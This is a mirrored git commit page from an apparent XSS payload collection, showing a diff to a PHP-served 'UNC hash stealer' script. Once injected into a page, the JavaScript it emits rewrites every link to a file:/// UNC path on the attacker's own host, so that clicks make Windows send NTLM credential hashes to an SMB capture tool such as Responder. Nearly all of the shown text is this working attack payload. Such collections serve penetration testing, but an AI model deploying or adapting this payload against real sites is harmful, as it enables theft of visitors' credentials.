mirror of
https://github.com/nettitude/xss_payloads.git
synced 2024-11-10 06:34:14 +00:00
Changed UNC hash stealer to re-write all links on the page to UNC path
This commit is contained in:
parent
298e52fccd
commit
2d31072193
1 changed files with 7 additions and 3 deletions
|
@ -1,8 +1,12 @@
|
|||
<?php
|
||||
/**
|
||||
* Inject this in order to have the browser call out to an SMB endpoint, e.g. Responder
|
||||
* Inject this in order to have all "a" links on the page reassigned to point to the SMB endpoint (e.g. Responder) on the host this script is running on
|
||||
*/
|
||||
$url = "file:///\\".$_SERVER["SERVER_ADDR"];
|
||||
$url = "file:///\\\\".$_SERVER["SERVER_ADDR"]."/page";
|
||||
echo "// $url\n";
|
||||
?>
|
||||
new Image().src="<?php echo $url; ?>";
|
||||
col = document.getElementsByTagName('a');
|
||||
for( var i in col ){
|
||||
el = col[i];
|
||||
el.href = '<?php echo $url; ?>';
|
||||
}
|
||||
|
|
Loading…
Reference in a new issue